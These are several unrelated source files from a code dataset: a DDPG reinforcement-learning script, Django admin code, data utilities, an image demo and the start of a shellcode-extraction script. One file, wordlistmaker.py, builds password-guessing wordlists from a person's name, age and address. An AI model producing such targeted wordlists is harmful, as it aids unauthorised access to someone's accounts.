dtype=tf.float32), (-1, 1))\n        # Known issue: cartpole reports an action shape of () (an empty tuple) even\n        # though there are actually two actions -- this looks like a bug\n        self.sy_actions = tf.placeholder(tf.float32, shape=[None, self.ac_dim], name='actions')\n
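\n    # --- Illustration (not part of the original class) -------------------------\n    # Why the tf.squeeze around tf.argmax below matters: argmax over axis=1 keeps\n    # a batch dimension, so for a single observation you get a shape-(1,) tensor,\n    # while env.step() wants a bare integer. The same effect shown with numpy:\n    #\n    #     import numpy as np\n    #     probs = np.array([[0.3, 0.7]])   # one observation, two actions\n    #     a = np.argmax(probs, axis=1)     # -> array([1]), shape (1,)\n    #     a = np.squeeze(a)                # -> array(1), which behaves as a scalar\n    # ---------------------------------------------------------------------------\n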
\n    def setup_network(self):\n        # Specifying reuse shares the network parameters inside a scope; self.actor\n        # returns a tensor with the probability of choosing each action\n        self.actor_tf = build_actor(self.sy_ob_no, self.ac_dim, scope_name='actor')\n        # With the default axis=0, argmax would normalize along the first dimension\n        # and always return [0, 0]\n        # tf.argmax returns a shape-[1] tensor; tf.squeeze reduces it to a scalar,\n        # otherwise env.step rejects the action in its input check\n        self.actor_choose_action = tf.squeeze(tf.argmax(self.actor_tf, axis=1))\n        # The target network receives the next observation\n        self.target_actor_tf = build_actor(self.sy_ob_next, self.ac_dim, scope_name='target_actor')\n\n        # The critic receives the actions placeholder; one can feed either the\n        # action probabilities (the raw output of the actor network)\n        # or the action index obtained from the argmax\n        self.critic_tf = build_critic(self.sy_ob_no, self.sy_actions, scope_name='critic')\n        # Here the model's action distribution is fed into the critic's second layer,\n        # so actor and critic share part of their parameters\n        # critic_tf and critic_with_actor_tf use the same network; only the action\n        # input differs\n        self.critic_with_actor_tf = build_critic(self.sy_ob_no, self.actor_tf, scope_name='critic', reuse=True)\n        # next_q uses the target actor's output as the action input\n        next_q = build_critic(self.sy_ob_next, self.target_actor_tf, scope_name='target_critic')\n        # If terminal_next were declared as a tf.int32 placeholder, this expression\n        # would raise an error\n        self.target_q = self.sy_rewards + (1 - self.terminal_next) * self.gamma * next_q\n\n        # setup var updates\n        actor_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='actor')\n        target_actor_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='target_actor')\n        critic_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='critic')\n        target_critic_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='target_critic')\n        actor_init_updates, actor_soft_updates = get_target_updates(actor_vars, target_actor_vars, self.tau)\n        critic_init_updates, critic_soft_updates = get_target_updates(critic_vars, target_critic_vars, self.tau)\n        self.target_init_updates = [actor_init_updates, critic_init_updates]\n        self.target_soft_updates = [actor_soft_updates, critic_soft_updates]\n\n        # setup loss\n        self.actor_loss = -tf.reduce_mean(self.critic_with_actor_tf)\n        # Constructing AdamOptimizer.minimize creates slot variables and doubles the\n        # variable count under actor_vars, so the target updates above must be set\n        # up before the losses\n        self.actor_update_op = tf.train.AdamOptimizer(self.actor_lr).minimize(self.actor_loss)\n        self.critic_loss = tf.reduce_mean(tf.square(self.critic_tf - self.sy_critic_targets))\n        self.critic_update_op = tf.train.AdamOptimizer(self.critic_lr).minimize(self.critic_loss)\n\n\n    def __init__(self,\n                 env=None,\n                 discrete=True,\n                 ob_shape=(),\n                 ac_dim=0,\n                 gamma=1.0,\n                 actor_lr=1e-4,\n                 critic_lr=1e-3,\n                 logdir=None,\n                 normalize_returns=True,\n                 # network arguments\n                 n_layers=1,\n                 size=32,\n                 gae_lambda=-1.0,\n                 tau=0.001  # parameter update rate\n                 ):\n        self.gamma = gamma\n        self.actor_lr = actor_lr\n        self.critic_lr = critic_lr\n        self.normalize_returns = normalize_returns\n        self.n_layers = n_layers\n        self.size = size\n        self.gae_lambda = gae_lambda\n        self.tau = tau\n\n        # Configure output directory for logging\n        logz.configure_output_dir(logdir)\n        # Log experimental parameters\n        # args = inspect.getfullargspec(train_DDPG)[0]\n        # locals_ = locals()\n        # params = {k: locals_[k] if k in locals_ else None for k in args}\n        # logz.save_params(params)\n\n        # Make the gym environment\n        self.env = env\n        # Is this env continuous, or discrete?\n        self.discrete = discrete\n        self.ac_dim = ac_dim\n        self.ob_dim = ob_shape[0]\n        # observation_shape in cartpole is a tuple such as (2,)\n        self.memory = Memory(limit=int(1e6), action_shape=ac_dim, observation_shape=ob_shape)\n        self.setup_placeholders()\n        self.setup_network()\n
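\n    # --- Illustration (not part of the original class) -------------------------\n    # pg_utils.get_target_updates is assumed to implement the usual DDPG Polyak\n    # averaging: the hard init copies the source weights into the target network,\n    # and the soft update nudges the target towards the source at rate tau. In\n    # TF1-style pseudocode, per variable pair (var, target_var):\n    #\n    #     init_update = tf.assign(target_var, var)\n    #     soft_update = tf.assign(target_var, (1. - tau) * target_var + tau * var)\n    #\n    # With tau=0.001 the targets trail the online networks slowly, which is what\n    # stabilises the bootstrapped target_q above.\n    # ---------------------------------------------------------------------------\n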
\n    def sample_action(self, obs, compute_Q=True):\n        feed_dict = {self.sy_ob_no: [obs]}\n        # The baselines implementation outputs the action probabilities directly and\n        # multiplies them by env.high when stepping the env -- the continuous-action\n        # approach; taking the argmax, as done here, is the discrete-action approach\n        # build_critic(self.sy_ob_no, self.actor_tf, scope_name='critic', reuse=True):\n        # the critic is fed the actor's output\n        if compute_Q:\n            action, action_prob, q = self.sess.run([self.actor_choose_action, self.actor_tf, self.critic_with_actor_tf], feed_dict=feed_dict)\n        else:\n            action, action_prob = self.sess.run([self.actor_choose_action, self.actor_tf], feed_dict=feed_dict)\n            q = None\n\n        # Remove redundant dimensions and clip to [-1, 1]\n        action_prob = action_prob.flatten()\n        action_prob = np.clip(action_prob, -1., 1.)\n        return action, action_prob, q\n\n    def soft_sync_target_actor(self):\n        self.sess.run(self.target_soft_updates)\n\n    def store_transition(self, obs0, action, reward, obs1, terminal1):\n        self.memory.append(obs0, action, reward, obs1, terminal1)\n\n    # Equivalent to baselines' ddpg.train: performs a single update\n    def update_loss(self):\n        batch = self.memory.sample(batch_size=self.batch_size)\n\n        target_Q = self.sess.run(self.target_q, feed_dict={\n            self.sy_ob_next: batch['obs1'],\n            self.sy_rewards: batch['rewards'],\n            self.terminal_next: batch['terminals1'].astype('float32'),\n        })\n        ops = [self.actor_loss, self.critic_loss, self.actor_update_op, self.critic_update_op]\n        actor_loss, critic_loss, _, _ = self.sess.run(ops, feed_dict={\n            self.sy_ob_no: batch['obs0'],\n            self.sy_actions: batch['actions'],\n            self.sy_critic_targets: target_Q,\n        })\n\n        return critic_loss, actor_loss\n\n    # The complete training loop\n    def train(self,\n              seed=0,\n              n_iter=100,\n              animate=False,\n              min_timesteps_per_batch=1000,\n              batch_epochs=1,\n              batch_size=32,\n              max_path_length=None,\n              ):\n        self.batch_size = batch_size\n        start = time.time()\n        # Set random seeds\n        tf.set_random_seed(seed)\n        np.random.seed(seed)\n        # Maximum length for episodes\n        max_path_length = max_path_length\n        tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)\n\n        sess = tf.Session(config=tf_config)\n        self.sess = sess\n        sess.__enter__() # equivalent to `with sess:`\n        tf.global_variables_initializer().run() # pylint: disable=E1101\n        sess.run(self.target_init_updates)\n        # todo: use finalize to make sure no new node in graph\n        #sess.graph.finalize() #make it readonly, speed up\n        # ========================================================================================#\n        # Training Loop\n        # ========================================================================================#\n        #max_action = self.env.action_space.high\n        total_timesteps = 0\n\n        for itr in range(n_iter):\n            #print('start train itr=%d max_step=%d batch=%d'%(itr, max_path_length, min_timesteps_per_batch))\n            # Collect paths until we have enough timesteps\n            # A path ends when the episode terminates or max_path_length is exceeded;\n            # each finished path is appended to paths, and once the total number of\n            # collected steps exceeds the batch requirement we stop collecting and\n            # start training, so every update uses complete paths only\n\n            # PG samples actions from the current policy distribution each time,\n            # with no separate exploration mechanism\n            # TODO: split observation collection and training into two processes so\n            # they no longer have to wait for each other\n            timesteps_this_batch = 0\n            paths = []\n            while True:\n                ob = self.env.reset()\n                #obs, acs, ac_probs, rewards, ob_nexts, dones = [], [], [], [], [], []\n                obs, acs, rewards, ob_nexts, dones = [], [], [], [], []\n                animate_this_episode = (len(paths) == 0 and (itr % 10 == 0) and animate)\n                steps = 0\n                while True:\n                    if animate_this_episode:\n                        self.env.render()\n                        time.sleep(0.05)\n                    obs.append(ob)\n                    # eval_obs, eval_r, eval_done, eval_info = eval_env.step(max_action * eval_action)\n                    # scale for execution in env (as far as DDPG is concerned, every action is in [-1, 1])\n                    # baselines clips actions to [-1, 1] before scaling; worth checking\n                    # whether that is necessary here\n                    if self.discrete:\n                        ac, ac_prob, q = self.sample_action(ob, False)\n                        acs.append(ac)\n                        ob_next, rew, done, _ = self.env.step(ac)\n                    else:\n                        _, ac_prob, q = self.sample_action(ob, False)\n                        #ac_prob = tf.Print(ac_prob, [ac_prob, ac_prob.shape], 'sample action')\n                        acs.append(ac_prob)\n                        ob_next, rew, done, _ = self.env.step(ac_prob)\n                    #ac_probs.append(ac_prob)\n\n                    ob_nexts.append(ob_next)\n                    dones.append(done)\n                    rewards.append(rew)\n                    self.store_transition(ob, ac_prob, rew, ob_next, done)\n                    steps += 1\n                    if done or steps > max_path_length:\n                        break\n
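\n                # --- Illustration (not part of the original loop) ---------------\n                # update_loss above regresses the critic onto the one-step TD\n                # target computed by self.target_q. With made-up numbers, for a\n                # non-terminal transition with r=1.0 and a target-network estimate\n                # Q'(s', a') = 2.0 at gamma=0.99:\n                #\n                #     target_Q = 1.0 + (1 - 0) * 0.99 * 2.0   # -> 2.98\n                #\n                # For a terminal transition the (1 - terminal) factor zeroes the\n                # bootstrap term and target_Q collapses to the reward.\n                # ----------------------------------------------------------------\n                path = {\"observation\": 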
np.array(obs),\n \"reward\": np.array(rewards),\n \"action\": np.array(acs),\n \"ob_next\": np.array(ob_nexts),\n \"done\": np.array(dones)}\n paths.append(path)\n timesteps_this_batch += pathlength(path)\n if timesteps_this_batch > min_timesteps_per_batch:\n break\n total_timesteps += timesteps_this_batch\n\n # Build arrays for observation, action for the policy gradient update by concatenating\n # across paths\n ob_no = np.concatenate([path[\"observation\"] for path in paths])\n ac_na = np.concatenate([path[\"action\"] for path in paths])\n\n # todo train process\n # todo memory sample in paths\n epoch_actor_losses = []\n epoch_critic_losses = []\n for epoch in range(batch_epochs):\n cl, al = self.update_loss()\n epoch_critic_losses.append(cl)\n epoch_actor_losses.append(al)\n self.soft_sync_target_actor()\n # Log diagnostics\n returns = [path[\"reward\"].sum() for path in paths]\n ep_lengths = [pathlength(path) for path in paths]\n #print('log iter %d'%itr)\n #logz.log_tabular(\"LossDelta\", loss_1 - loss_2)\n logz.log_tabular(\"Time\", time.time() - start)\n logz.log_tabular(\"Iteration\", itr)\n logz.log_tabular(\"AverageReturn\", np.mean(returns))\n logz.log_tabular(\"StdReturn\", np.std(returns))\n logz.log_tabular(\"MaxReturn\", np.max(returns))\n logz.log_tabular(\"MinReturn\", np.min(returns))\n logz.log_tabular(\"EpLenMean\", np.mean(ep_lengths))\n logz.log_tabular(\"EpLenStd\", np.std(ep_lengths))\n logz.log_tabular(\"TimestepsThisBatch\", timesteps_this_batch)\n logz.log_tabular(\"TimestepsSoFar\", total_timesteps)\n logz.dump_tabular()\n logz.pickle_tf_vars()\n\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('env_name', type=str)\n parser.add_argument('--exp_name', type=str, default='ddpg')\n parser.add_argument('--render', action='store_true')\n parser.add_argument('--discount', type=float, default=1.0)\n parser.add_argument('--n_iter', '-n', type=int, default=1000)\n parser.add_argument('--batch_size', '-b', type=int, default=1000)\n parser.add_argument('--ep_len', '-ep', type=float, default=-1.)\n parser.add_argument('--actor_learning_rate', '-alr', type=float, default=5e-5)\n parser.add_argument('--critic_learning_rate', '-clr', type=float, default=5e-4)\n parser.add_argument('--critic_update_tau', '-tau', type=float, default=0.001)\n parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')\n parser.add_argument('--seed', '-seed', type=int, default=1)\n parser.add_argument('--n_experiments', '-e', type=int, default=1)\n parser.add_argument('--n_layers', '-l', type=int, default=1)\n parser.add_argument('--size', '-s', type=int, default=32)\n parser.add_argument('--gae_lambda', '-gae', type=float, default=-1.0)\n parser.add_argument('--batch_epochs', '-be', type=int, default=1)\n args = parser.parse_args()\n\n if not (os.path.exists('data')):\n os.makedirs('data')\n logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime(\"%d-%m-%Y_%H-%M-%S\")\n logdir = os.path.join('data', logdir)\n if not (os.path.exists(logdir)):\n os.makedirs(logdir)\n\n env = gym.make(args.env_name)\n discrete = isinstance(env.action_space, gym.spaces.Discrete)\n max_path_length = args.ep_len if args.ep_len > 0 else env.spec.max_episode_steps\n ob_shape = env.observation_space.shape\n ac_dim = env.action_space.n if discrete else env.action_space.shape[0]\n\n # for e in range(args.n_experiments):\n # seed = args.seed + 10*e\n # print('Running experiment with seed %d'%seed)\n # def train_func():\n # train_PG(\n # 
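\n    # --- Illustration (not part of the original script) -------------------------\n    # A typical invocation, using the flags defined by the argparse setup above\n    # (the env name is positional; hyperparameters are optional):\n    #\n    #     python train_ddpg.py CartPole-v0 -n 100 -b 1000 -alr 5e-5 -clr 5e-4 -tau 0.001\n    #\n    # -n is the number of iterations, -b the number of timesteps per batch.\n    # ----------------------------------------------------------------------------\n    #                 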
exp_name=args.exp_name,\n # env_name=args.env_name,\n # n_iter=args.n_iter,\n # gamma=args.discount,\n # min_timesteps_per_batch=args.batch_size,\n # max_path_length=max_path_length,\n # learning_rate=args.learning_rate,\n # reward_to_go=args.reward_to_go,\n # animate=args.render,\n # logdir=os.path.join(logdir,'%d'%seed),\n # normalize_advantages=not(args.dont_normalize_advantages),\n # nn_baseline=args.nn_baseline,\n # seed=seed,\n # n_layers=args.n_layers,\n # size=args.size\n # )\n # # Awkward hacky process runs, because Tensorflow does not like\n # # repeatedly calling train_PG in the same thread.\n # p = Process(target=train_func, args=tuple())\n # p.start()\n # p.join()\n\n seed = args.seed\n print('Running experiment with seed %d' % seed)\n ddpg = DDPG(\n env=env,\n discrete=discrete,\n ac_dim=ac_dim,\n ob_shape=ob_shape,\n gamma = args.discount,\n actor_lr=args.actor_learning_rate,\n critic_lr=args.critic_learning_rate,\n logdir=os.path.join(logdir, '%d' % seed),\n normalize_returns=not (args.dont_normalize_advantages),\n # network arguments\n n_layers=args.n_layers,\n size=args.size,\n gae_lambda=args.gae_lambda,\n tau=args.critic_update_tau,\n )\n ddpg.train(\n n_iter=args.n_iter,\n seed=seed,\n min_timesteps_per_batch=args.batch_size,\n animate=args.render,\n batch_epochs=args.batch_epochs,\n batch_size=args.batch_size,\n max_path_length=max_path_length\n )\n\nif __name__ == \"__main__\":\n main()","sub_path":"hw2/train_ddpg.py","file_name":"train_ddpg.py","file_ext":"py","file_size_in_byte":17851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"428005948","text":"from django.contrib import admin\nfrom django.conf.urls import patterns, url\nfrom django.contrib.admin import helpers\nfrom django.contrib.admin.util import unquote\nfrom django.core.urlresolvers import reverse\nfrom django.http import Http404, HttpResponse\nfrom django.template.response import TemplateResponse\n\nfrom dprofiling.forms import StatsForm\nfrom dprofiling.models import Session, Profile\nfrom dprofiling.backends import get_backend\n\n\n\n\n\nclass SessionAdmin(admin.ModelAdmin):\n list_display = ('name', 'path', 'active', 'stats_link')\n list_filter = ('active',)\n\n def stats_link(self, obj):\n return 'Stats' % (reverse('admin:dprofiling_session_stats',\n args=(obj.pk,)),)\n\n stats_link.allow_tags = True\n stats_link.short_description = 'Cumulative Stats'\n\n def get_urls(self):\n urls = super(SessionAdmin, self).get_urls()\n info = (self.model._meta.app_label,\n self.model._meta.module_name)\n session_urls = patterns('',\n url(r'^(.+)/stats/$',\n self.admin_site.admin_view(self.stats_view),\n name='%s_%s_stats' % info),\n )\n return session_urls + urls\n\n def stats_view(self, request, object_id, extra_context=None):\n \"\"\" Render a view for selecting details before printing stats \"\"\"\n opts = self.model._meta\n app_label = opts.app_label\n backend = get_backend()\n if not callable(getattr(backend, 'get_stats', None)):\n raise Exception('Current backend does not support getting '\n 'aggregate stats')\n obj = self.get_object(request, unquote(object_id))\n\n if obj is None:\n raise Http404('Stats object does not exist')\n\n if request.method == 'POST':\n form = StatsForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n stats, output = backend.get_stats(obj)\n if not stats:\n raise Http404('No stats collected for this object')\n if data['strip_dirs']:\n stats.strip_dirs()\n if data['sort']:\n stats.sort_stats(*data['sort'])\n if 
data['reverse_sort']:\n stats.reverse_order()\n method = getattr(stats, 'print_%s' % (data['method'],))\n method(*data['restrictions'])\n return HttpResponse(output.getvalue(),\n content_type='text/plain')\n else:\n form = StatsForm()\n\n adminform = helpers.AdminForm(form,\n [\n (None, {'fields':[\n 'sort','reverse_sort','strip_dirs', 'restrictions','method']\n }),\n ], {})\n\n context = {\n 'title': 'Stats for %s' % obj.name,\n 'adminform': adminform,\n 'object_id': object_id,\n 'original': obj,\n 'is_popup': \"_popup\" in request.REQUEST,\n 'errors': helpers.AdminErrorList(form, None),\n 'app_label': opts.app_label,\n 'opts': opts,\n 'add': False,\n }\n context.update(extra_context or {})\n return TemplateResponse(request,\n ['admin/dprofiling/session/stats_form.html'], context,\n current_app=self.admin_site.name)\n\n\n\nclass ProfileAdmin(admin.ModelAdmin):\n pass\n\nadmin.site.register(Session, SessionAdmin)\nadmin.site.register(Profile, ProfileAdmin)\n\n","sub_path":"dprofiling/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"245575635","text":"#!/usr/bin/python\n#################################################################\nimport csv\nfrom Attributes import RealAttr, CategoricalAttr, StringAttr\nfrom Case import Case\n\n\"\"\" file with functions to read csv files \"\"\"\n\ndef readCurrentCase(row, types, names):\n attrs = {}\n for i in xrange(0, len(types)):\n if types[i] == 'r':\n attrs[names[i]] = RealAttr(row[i])\n elif types[i] == 'c':\n attrs[names[i]] = CategoricalAttr(row[i])\n elif types[i] == 's':\n attrs[names[i]] = StringAttr(row[i])\n\n else:\n raise Exception('wrong item on input')\n\n #attrs contains the attributes of the case\n return Case(attrs)\n\ndef readCase(row, types, names, label_name):\n attrs = {}\n for i in xrange(0, len(types)):\n if types[i] == 'r':\n attrs[names[i]] = RealAttr(row[i])\n elif types[i] == 'c':\n attrs[names[i]] = CategoricalAttr(row[i])\n elif types[i] == 's':\n attrs[names[i]] = StringAttr(row[i])\n\n else:\n raise Exception('wrong item on input')\n\n #attrs contains the attributes of the case\n label = attrs[label_name]\n attrs.pop(label_name)\n return Case(attrs, {label_name : label})\n\ndef readCasesFromCsv(filename, types, names, label_name):\n cases = []\n m = len(types)\n with open(filename, 'rb') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if row:\n if len(row) != m:\n raise Exception('the elements of the csv are not '\\\n 'consistent with the structure provided.')\n case = readCase(row, types, names, label_name)\n cases.append(case)\n return cases\n","sub_path":"deliverable/source_code/readingCsv.py","file_name":"readingCsv.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"203432131","text":"import requests\nfrom fake_useragent import UserAgent\nfrom config import name, pwd\n\nua = UserAgent(verify_ssl=False)\n# 随机选择 User-Agent ,random 是实例的属性\n# Referer 说明你是从哪里来的\n# x-requested-with 防止 crsf\n\nheaders = {\n 'User-Agent': ua.random,\n 'Referer': 'https://shimo.im/login?from=home',\n 'x-requested-with': 'XmlHttpRequest'\n}\n\ns = requests.Session()\n\nlogin_url = 'https://shimo.im/login?from=home'\n\nform_data = {\n 'ck': '',\n 'name': name,\n 'password': pwd,\n 'remember': 'true'\n}\n\nresp = s.post(login_url, data=form_data, headers=headers, 
cookies=s.cookies)\n\nprint(resp.status_code)\n\n# 验证登录是否成功,\nresp = s.get('https://shimo.im/dashboard/favorites', headers=headers)\nprint(resp)\nprint(resp.text)\n","sub_path":"week02/shimo_login/shimo_login_by_request.py","file_name":"shimo_login_by_request.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"554575711","text":"import random\nfrom colorama import Fore\nfrom itertools import product\nFirst = input(Fore.GREEN + \"First name: \")\nSur = input(\"Surname: \")\nAge = input(\"Age: \")\nAddress = input(\"Address: \")\nSpec = input(\"Special character(s): \")\ndef allwords(chars, length):\n\tfor letters in product(chars, repeat=length):\n\t\tyield ''.join(letters)\ndef main():\n\tletters = First + Sur + Age + Address + Spec\n\tfor wordlen in range(7, 40):\n\t\tfor word in allwords(letters, wordlen):\n\t\t\tprint(word)\nif __name__==\"__main__\":\n\tmain()\n","sub_path":"wordlistmaker.py","file_name":"wordlistmaker.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"156704942","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom src.com.cv.DetectObject.HistogramOfOrientedGradients.NonMaxSuppression.fast.non_max_suppression_fast import \\\n non_max_suppression_fast\n\n# load the image\nimage_path = \"../images/\"\noriginal_image = cv2.imread(image_path + \"example_02.jpg\")\n# show original image\nwindow_name = 'Original Image'\ncv2.imshow(window_name, original_image)\ncv2.waitKey()\n\n# example_01\n# startX, startY, endX, endY\n# boundingBoxes = np.array([\n# (12, 84, 140, 212),\n# (24, 84, 152, 212),\n# (36, 84, 164, 212),\n# (12, 96, 140, 224),\n# (24, 96, 152, 224),\n# (24, 108, 152, 236)])\n\n# example_02\n# startX, startY, endX, endY\nboundingBoxes = np.array([\n (114, 60, 178, 124),\n (120, 60, 184, 124),\n (114, 66, 178, 130)])\n\n# example_03\n# startX, startY, endX, endY\n# boundingBoxes = np.array([\n# (12, 30, 76, 94),\n# (12, 36, 76, 100),\n# (72, 36, 200, 164),\n# (84, 48, 212, 176)])\n\n# clone original image\nbefore_perform_non_max_suppression = original_image.copy()\nprint(\"Before applying non-maximum: %d bounding boxes\" % (len(boundingBoxes)))\n# draw bounding boxes\ncolors = ((0, 0, 255), (240, 0, 159), (0, 165, 255), (255, 255, 0), (255, 0, 255), (255, 0, 0))\nfor ((startX, startY, endX, endY), color) in zip(boundingBoxes, colors):\n cv2.rectangle(before_perform_non_max_suppression, (startX, startY), (endX, endY), color, 2)\n\n# clone original image\nafter_perform_non_max_suppression = original_image.copy()\n# perform non-maximum suppression on the bounding boxes\nkeeping_boundingBoxes = non_max_suppression_fast(boundingBoxes, 0.3)\nprint(\"After applying non-maximum: %d bounding boxes\" % (len(keeping_boundingBoxes)))\n# draw bounding boxes\nfor (startX, startY, endX, endY) in keeping_boundingBoxes:\n cv2.rectangle(after_perform_non_max_suppression, (startX, startY), (endX, endY), (0, 255, 0), 2)\n\n# show Result\nfig = plt.figure(\"Result\")\nimages = (\"Before\", before_perform_non_max_suppression), \\\n (\"After \", after_perform_non_max_suppression)\nfor (i, (name, image)) in enumerate(images):\n ax = fig.add_subplot(1, 2, i + 1)\n ax.set_title(name)\n plt.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n plt.axis(\"off\")\n# show the 
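\n# --- Illustration (not part of the original example) --------------------------\n# non_max_suppression_fast keeps a box and discards neighbours whose overlap with\n# it exceeds the threshold (0.3 above). The overlap of two axis-aligned boxes\n# given as (startX, startY, endX, endY), sketched with numpy:\n#\n#     import numpy as np\n#     a = np.array([114, 60, 178, 124])\n#     b = np.array([120, 60, 184, 124])\n#     iw = max(0, min(a[2], b[2]) - max(a[0], b[0]))   # intersection width  -> 58\n#     ih = max(0, min(a[3], b[3]) - max(a[1], b[1]))   # intersection height -> 64\n#     inter = iw * ih                                  # -> 3712\n#\n# Dividing by a box area turns this into the overlap ratio the suppression uses.\n# -------------------------------------------------------------------------------\n\n# show the 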
figure\nplt.show()\n","sub_path":"src/com/cv/DetectObject/HistogramOfOrientedGradients/NonMaxSuppression/fast/Example.py","file_name":"Example.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"106956447","text":"from tools.testing import Test, TestError\n\n@Test.wrap\ndef not_null(df, ignore=[]):\n \"\"\"True if a Pandas.DataFrame doesn't contain any null values\"\"\"\n columns = [col for col in df if col not in ignore]\n return df[columns].notnull().all().all()\n\n@Test.wrap\ndef unique_column(df, column):\n \"\"\"True if a Pandas.DataFrame has a single value for a given column\"\"\"\n if column not in df.columns:\n raise TestError(f\"DataFrame doesn't have a `{column}` column\")\n return len(df[column].unique()) == 1\n\n@Test.wrap\ndef no_duplicates(df):\n \"\"\"True if the Pandas.DataFrame doesn't contain duplicate rows\"\"\"\n return not df.duplicated().any()\n\n@Test.wrap\ndef contains_column(df, column):\n \"\"\" True if the dataframe contains the column\"\"\"\n return column in df.columns\n\n@Test.wrap\ndef prevalence_under_1(df):\n \"\"\" True if the Pandas.DataFrame has means under 1 for prevalence measures\"\"\"\n if \"mean\" not in df.columns or \"measure_id\" not in df.columns:\n raise TestError(\"DataFrame is missing a mean or measure_id column\")\n return (df.loc[df.measure_id == 5, \"mean\"] <= 1).all()\n\n@Test.wrap\ndef lower_less_than_mean(df):\n \"\"\" True if the Pandas.DataFrame has a lower less than the mean\"\"\"\n if \"mean\" not in df.columns or \"lower\" not in df.columns:\n raise TestError(\"DataFrame doesn't have a mean or lower column\")\n return (df[\"lower\"] <= df[\"mean\"]).all()\n\n@Test.wrap\ndef upper_greater_than_mean(df):\n \"\"\" True if the Pandas.DataFrame has an upper greater than the mean\"\"\"\n if \"mean\" not in df.columns or \"upper\" not in df.columns:\n raise TestError(\"DataFrame doesn't have a mean or upper column\")\n return (df[\"upper\"] >= df[\"mean\"]).all()\n\n\n@Test.wrap\ndef _upload_columns_test(df):\n \"\"\"True if the Pandas.DataFrame contains all the columns needed to upload to the DB\"\"\"\n required_columnms = ['bundle_id',\n 'merged_nid',\n 'estimate_id',\n 'location_id',\n 'sex_id',\n 'year_start',\n 'year_end',\n 'age_group_id',\n 'measure_id',\n 'source_type_id',\n 'representative_id',\n 'uncertainty_type_id',\n 'uncertainty_type_value',\n 'mean',\n 'lower',\n 'upper',\n 'standard_error',\n 'effective_sample_size',\n 'sample_size',\n 'cases']\n \n for column in required_columnms:\n if column not in df:\n return False\n return True\n","sub_path":"gbd_2019/nonfatal_code/clinical_team/Upload/tools/tests/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"23921767","text":"import os\nimport pydicom\nimport numpy as np\nfrom PIL import Image as pillow\n\nfrom utils import mkdir\n\nall_uploads = os.path.join('static', 'uploads')\nimages_dir = os.path.join(all_uploads, 'images')\nthumbnails_dir = os.path.join(all_uploads, 'thumbnails')\n\nthumbnail_size = (256,256)\n\ndef normalize_and_scale(image_as_np):#I took this function from code I wrote for my current Simons Foundation Fellowship\n\n #potential improvement is to account for the zero case, where min-max = 0 \n #however, this is unlikely for most DICOM images\n\n int_range = float(image_as_np.max()-image_as_np.min())\n norm_image = (image_as_np - 
image_as_np.min()) / int_range\n \n return (255. * norm_image).astype(np.uint8) #scale values (prior: logistic function) from 0 to 255\n\ndef read_dicom(filename):#this is just a wrapper function to be used as a util \n return pydicom.read_file(filename)\n\n\ndef make_thumbnail(raw_read, file_in):\n pixels = raw_read.pixel_array #this is a numpy array\n norm_pixels = normalize_and_scale(pixels)\n\n img = pillow.fromarray(norm_pixels)\n\n\n mkdir(images_dir)\n img_name = '{}.png'.format(file_in)\n img_path = os.path.join(images_dir, img_name)\n img.save(img_path, 'JPEG')\n\n img.thumbnail(thumbnail_size)\n\n mkdir(thumbnails_dir)\n file_out = os.path.join(thumbnails_dir, img_name)\n\n img.save(file_out, 'JPEG')\n\n return img_name\n \n\n","sub_path":"dicom.py","file_name":"dicom.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"581009130","text":"\nfrom treys.card import Card\n\n\nclass Evaluator(object):\n\n SPADES_QUEEN = Card.new('Qs') \n\n def __init__(self):\n pass\n \n def _calculate_score(self, cards):\n suits = [Card.get_suit_int(c) for c in cards]\n score = suits.count(Card.CHAR_SUIT_TO_INT_SUIT['h'])\n if Evaluator.SPADES_QUEEN in cards:\n score += 13\n return score\n\n def _identify_looser(self, cards, ids):\n suits = [Card.get_suit_int(c) for c in cards]\n if suits[1:].count(suits[0]) == 0:\n return ids[0]\n first_rank = Card.get_rank_int(cards[0])\n max_rank = first_rank\n max_index = 0\n number_of_cards = len(cards)\n for i in range(1, number_of_cards):\n if suits[i] == suits[0]:\n tmp_rank = Card.get_rank_int(cards[i])\n if tmp_rank > max_rank:\n max_index = i\n tmp_rank = max_rank\n return ids[max_index]\n \n def evaluate(self, cards, ids):\n return self._calculate_score(cards), self._identify_looser(cards, ids)\n\n","sub_path":"gymhearts/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"537047570","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nProgram: build_and_extract_x86_payload.py\n\nDate: 07/07/2021\n\nAuthor: Travis Phillips\n\nPurpose: This script will build a GAS source file object and extract\n its .text section and print it out as a formatted payload to\n be copied and pasted 